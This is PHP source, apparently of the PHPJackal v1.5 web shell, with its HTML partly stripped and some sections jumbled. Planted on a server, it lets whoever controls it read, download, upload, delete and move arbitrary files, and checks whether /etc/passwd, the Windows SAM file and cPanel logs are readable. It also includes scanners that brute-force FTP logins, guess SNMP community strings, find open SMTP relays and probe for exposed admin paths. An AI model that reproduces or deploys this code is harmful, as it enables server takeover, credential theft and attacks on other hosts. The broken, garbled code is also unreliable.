#--Config--#
$login_password= ''; //Set password
#----------#
error_reporting(E_ALL);
set_time_limit(0);
ini_set("max_execution_time","0");
ini_set("memory_limit","9999M");
set_magic_quotes_runtime(0);
if(!isset($_SERVER))$_SERVER = &$HTTP_SERVER_VARS;
if(!isset($_POST))$_POST = &$HTTP_POST_VARS;
if(!isset($_GET))$_GET = &$HTTP_GET_VARS;
if(!isset($_COOKIE))$_COOKIE=$HTTP_COOKIE_VARS;
$_REQUEST = array_merge($_GET, $_POST);
if (get_magic_quotes_gpc()){
foreach ($_REQUEST as $key=>$value)
{
$_REQUEST[$key]=stripslashes($value);
}
}
function hlinK($str=""){
$myvars=array('workingdiR','urL','imagE','namE','filE','downloaD','seC','cP','mV','rN','deL');
$ret=$_SERVER['PHP_SELF']."?";
$new=explode("&",$str);
foreach ($_GET as $key => $v){
$add=1;
foreach($new as $m){
$el = explode("=", $m);
if ($el[0]==$key)$add=0;
}
if($add)if(!in_array($key,$myvars))$ret.=$key."=".$v."&";
}
$ret.=$str;
return $ret;
}
if(!empty($login_password)){
if(!empty($_REQUEST['fpassw'])){
if($_REQUEST['fpassw']==$login_password)setcookie('passw',md5($_REQUEST['fpassw']));
@header("Location: ".hlinK());
}
if(empty($_COOKIE['passw']) || $_COOKIE['passw']!=md5($login_password))die("

 
Password:
 

");
}
if (!empty($_REQUEST['workingdiR'])) chdir($_REQUEST['workingdiR']);
function checkthisporT($ip,$port,$timeout,$type=0){
if(!$type){
$scan=@fsockopen($ip,$port,$n,$s,$timeout);
if($scan){fclose($scan);return 1;}
}
elseif(function_exists('socket_set_timeout')){
$scan=@fsockopen("udp://".$ip,$port);
if($scan){
socket_set_timeout($scan,$timeout);
@fwrite($scan,"\x00");
$s=time();
fread($scan,1);
if((time()-$s)>=$timeout){fclose($scan);return 1;}
}
}
return 0;
}
if (!function_exists("file_get_contents")){
function file_get_contents($addr){
$a = fopen($addr,"r");
$tmp = fread($a,filesize($a));
fclose($a);
if($a)return $tmp;
}
}
if (!function_exists("file_put_contents")){
function file_put_contents($addr,$con){
$a = fopen($addr,"w");
if(!$a)return 0;
fwrite($a,$con);
fclose($a);
return strlen($con);
}
}
function flusheR(){
flush();@ob_flush();
}
if (!empty($_REQUEST['downloaD'])){
@ob_clean();
$dl=$_REQUEST['downloaD'];
$con=file_get_contents($dl);
header("Content-type: application/octet-stream");
header("Content-disposition: attachment; filename=\"$dl\";");
header("Content-length: ".strlen($con));
echo $con;
exit;
}
if (!empty($_REQUEST['imagE'])){
$img=$_REQUEST['imagE'];
header("Content-type: imagE/gif");
header("Content-length: ".filesize($img));
header("Last-Modified: ".date("r",filemtime($img)));
echo file_get_contents($img);
exit;
}
@header("Cache-Control: no-cache, must-revalidate");
@header("Expires: Mon, 7 Aug 1987 05:00:00 GMT");
function showsizE($size){
if ($size>=1073741824)$size = round(($size/1073741824) ,2)." GB";
elseif ($size>=1048576)$size = round(($size/1048576),2)." MB";
elseif ($size>=1024)$size = round(($size/1024),2)." KB";
else $size .= " B";
return $size;
}
if (substr((strtoupper(php_unamE())),0,3)=="WIN") $windows=1; else $windows=0;
$errorbox = "

$et = "

";
$v="1.5";
$msgbox="

$intro="
$footer="${msgbox}PHPJackal v$v - Powered By NetJackal$et";
$hcwd="";
$t = "
 
$crack="  
Dictionary:
Dictionary type: $url
";}
flusheR();
}
elseif(strstr($page,'@ADMINDIRS'))
foreach ($admin as $cg){
$adminch=str_replace('@ADMINDIRS',$cg,$page);
$url="http://$ip$adminch";
$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
if($res){$output=1;echo "$ip)".$vuln[4]." $url
";}
flusheR();
}
elseif(strstr($page,'@USERS'))
foreach ($users as $cg){
$userch=str_replace('@USERS',$cg,$page);
$url="http://$ip$userch";
$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
if($res){$output=1;echo "$ip)".$vuln[4]." $url
";}
flusheR();
}
elseif(strstr($page,'@NUKE'))
foreach ($nuke as $cg){
$nukech=str_replace('@NUKE',$cg,$page);
$url="http://$ip$nukech";
$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
if($res){$output=1;echo "$ip)".$vuln[4]." $url
";}
flusheR();
}
else{
$url="http://$ip$page";
$res=check_urL($url,$vuln[3],$vuln[2],$timeout);
if($res){$output=1;echo "$ip)".$vuln[4]." $url
";}
flusheR();
}
}
}
}
if(!empty($_REQUEST['smtprelay'])){
if(checkthisporT($ip,25,$timeout)){
$res='';
$res=checksmtP($ip,$timeout);
if($res==1){echo "$ip) SMTP relay found.
";$output=1;}flusheR();
}
}
if(!empty($_REQUEST['snmpscanner'])){
if(checkthisporT($ip,161,$timeout,1)){
$com=$_REQUEST['com'];
$coms=$res="";
if(strstr($com,","))$c=explode(",",$com);else $c[0]=$com;
foreach ($c as $v){
$ret=snmpchecK($ip,$v,$timeout);
if($ret)$coms .=" $v ";
}
if ($coms!=""){echo "$ip) SNMP FOUND: $coms
";$output=1;}
flusheR();
}
}
if(!empty($_REQUEST['ftpscanner'])){
if(checkthisporT($ip,21,$timeout)){
$usps=explode(',',$_REQUEST['userpass']);
foreach ($usps as $v){
$user=substr($v,0,strpos($v,':'));
$pass=substr($v,strpos($v,':')+1);
if($pass=='[BLANK]')$pass='';
$ftp=@ftp_connect($ip,21,$timeout);
if ($ftp){
if(@ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) $ip System type: ".ftp_systype($ftp)."
";}
}
flusheR();
}
}
}
if($output)echo "
";
flusheR();
}
$time=time()-$start;
echo "Done! ($time seconds)";
if(!empty($buglist))unlink($buglist);
}
else{
$chbox=(extension_loaded('sockets'))?"TCPUDP":"";
echo "

$host = substr($host,0,strrpos($host,"."));
echo "
FTP password:
 

";
}
}
function sysinfO(){
global $windows,$disablefunctions,$safemode;
$cwd= getcwd();
$mil=" $basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
if (!empty($_SERVER["PROCESSOR_IDENTIFIER"])) $CPU = $_SERVER["PROCESSOR_IDENTIFIER"];
$osver=$tsize=$fsize='';
if ($windows){
$osver = "  (".shelL("ver").")";
$sysroot = shelL("echo %systemroot%");
if (empty($sysroot)) $sysroot = $_SERVER["SystemRoot"];
if (empty($sysroot)) $sysroot = getenv("windir");
if (empty($sysroot)) $sysroot = "Not Found";
if (empty($CPU))$CPU = shelL("echo %PROCESSOR_IDENTIFIER%");
for ($i=66;$i<=90;$i++){
$drive= chr($i).':\\';
if (is_dir($drive)){
$fsize+=@disk_free_space($drive);
$tsize+=@disk_total_space($drive);
}
}
}else{
$fsize=disk_free_space('/');
$tsize=disk_total_space('/');
}
$disksize="Used spase: ". showsizE($tsize-$fsize) . "   Free space: ". showsizE($fsize) . "   Total space: ". showsizE($tsize);
if (empty($CPU)) $CPU = "Unknow";
$os = php_unamE();
$osn=php_unamE('s');
if(!$windows){
$ker = php_unamE('r');
$o=($osn=="Linux")?"Linux+Kernel":$osn;
$os = str_replace($osn,"${mil}$o\">$osn
",$os);
$os = str_replace($ker,"${mil}Linux+Kernel\">$ker",$os);
$inpa=':';
}else{
$sam = $sysroot."\\system32\\config\\SAM";
$inpa=';';
$os = str_replace($osn,"${mil}MS+Windows\">$osn",$os);
}
$software=str_replace("Apache","${mil}Apache\">Apache",$_SERVER['SERVER_SOFTWARE']);
echo "";
if ($windows){
echo "";
}
else
{
echo "";
}
$uip =(!empty($_SERVER['REMOTE_ADDR']))?$_SERVER['REMOTE_ADDR']:getenv('REMOTE_ADDR');
echo "";if (function_exists('curl_init')) echo "";echo "
if (is_readable('/etc/passwd')) echo "Readable"; else echo'Not readable';echo "
Cpanel log file: ";
if (file_exists("/var/cpanel/accounting.log")){if (is_readable("/var/cpanel/accounting.log")) echo "Readable"; else echo "Not readable";}else echo "Not found";
echo "
${mil}PHP\">PHP version: ".PHP_VERSION." (more...)
Zend version: ";if (function_exists('zend_version')) echo "".zend_version()."";else echo "Not Found";echo "
Include path: ".str_replace($inpa," ",DEFAULT_INCLUDE_PATH)."
PHP Modules: ";$ext=get_loaded_extensions();foreach($ext as $v)echo $v." ";echo "
Disabled functions: ";if(!empty($disablefunctions))echo $disablefunctions;else echo "Nothing"; echo"
Safe mode: $safemode
Open base dir: $basedir
DBMS: ";$sq="";if(function_exists('mysql_connect')) $sq= "${mil}MySQL\">MySQL ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL\">MSSQL ";if(function_exists('ora_logon')) $sq.= " ${mil}Oracle\">Oracle ";if(function_exists('sqlite_open')) $sq.= " SQLite ";if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL\">PostgreSQL ";if(function_exists('msql_connect')) $sq.= " mSQL ";if(function_exists('mysqli_connect'))$sq.= " MySQLi ";if(function_exists('ovrimos_connect')) $sq.= " Ovrimos SQL ";if ($sq=="") $sq= "Nothing"; echo "$sq
cURL support: Enabled ";if(function_exists('curl_version')){$ver=curl_version();echo "(Version:". $ver['version']." OpenSSL version:". $ver['ssl_version']." zlib version:". $ver['libz_version']." host:". $ver['host'] .")";}echo "
User information:
IP: $uip
Agent: ".getenv('HTTP_USER_AGENT')."
";
}
function checksuM($file){
global $et;
echo "
}
function listdiR($cwd,$task){
$c= getcwd();
$dh = opendir($cwd);
while ($cont=readdir($dh)){
if($cont=='.' || $cont=='..')continue;
$adr = $cwd.DIRECTORY_SEPARATOR.$cont;
switch ($task){
case '0':if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";break;
case '1':if(is_writeable($adr))if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";break;
case '2':if(is_file($adr) &&  is_writeable($adr))echo "[$adr]\n";break;
case '3':if(is_dir($adr) && is_writeable($adr))echo "[$adr]\n";break;
case '4':if(is_file($adr))echo "[$adr]\n";break;
case '5':if(is_dir($adr))echo "[$adr]\n";break;
case '6':if(preg_match("@".$_REQUEST['search']."@",$cont)){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break;
case '7':if(strstr($cont,$_REQUEST['search'])){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break;
}
if (is_dir($adr)) listdiR($adr,$_REQUEST['task']);
}
}
if (!function_exists("posix_getpwuid") && !strstr($disablefunctions,'posix_getpwuid')) {function posix_getpwuid($u) {return 0;}}
if (!function_exists("posix_getgrgid") && !strstr($disablefunctions,'posix_getgrgid')) {function posix_getgrgid($g) {return 0;}}
function filemanager(){
global $windows,$msgbox,$errorbox,$t,$et,$hcwd;
$cwd= getcwd();
$table = "";
$td1n="
$td2m=" ";
$td1i="
";
$td2i="
";
$tdnr="
";
$tdw="
";
if (!empty($_REQUEST['task'])){
if (!empty($_REQUEST['search'])) $_REQUEST['task'] = 7;
if (!empty($_REQUEST['re'])) $_REQUEST['task'] = 6;
echo "
";

	listdiR($cwd,$_REQUEST['task']);

	echo "
";
}else{
if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])|| !empty($_REQUEST['rN'])){
if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])){
$title="Destination";
$ad = (!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV'];
$dis =(!empty($_REQUEST['cP']))?'Copy':'Move';
}else{
$ad = $_REQUEST['rN'];
$title ="New name";
$dis = "Rename";
}
if (!!empty($_REQUEST['deS'])){
echo "
$td1n$td2m$hcwd
}else{
if (!empty($_REQUEST['rN'])) renamE($ad,$_REQUEST['deS']);
else{
copy($ad,$_REQUEST['deS']);
if (!empty($_REQUEST['mV']))unlink($ad);
}
}
}
if (!empty($_REQUEST['deL'])) { if (is_file($_REQUEST['deL'])|| is_link($_REQUEST['deL'])) unlink($_REQUEST['deL']);elseif(is_dir($_REQUEST['deL'])) {
$dh = opendir($_REQUEST['deL']);
$d="";
while ($cont=readdir($dh)){$d++;}
if ($d>2) echo "$errorbox\"".htmlspecialchars($_REQUEST['del'])."\" is not empty!
 

";else rmdir($_REQUEST['del']);}}
if (!empty($_FILES['uploadfile'])){
move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']);
echo "$msgboxUploaded! File name: ".$_FILES['uploadfile']['name']." File size: ".$_FILES['uploadfile']['size']. "$et
";
}
$select = "
Drives: ";
for ($i=66;$i<=90;$i++){$drive= chr($i).':';
if (is_dir($drive."\\")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " $drive\\";}
}
echo $et;
}
echo "$table
 
Location: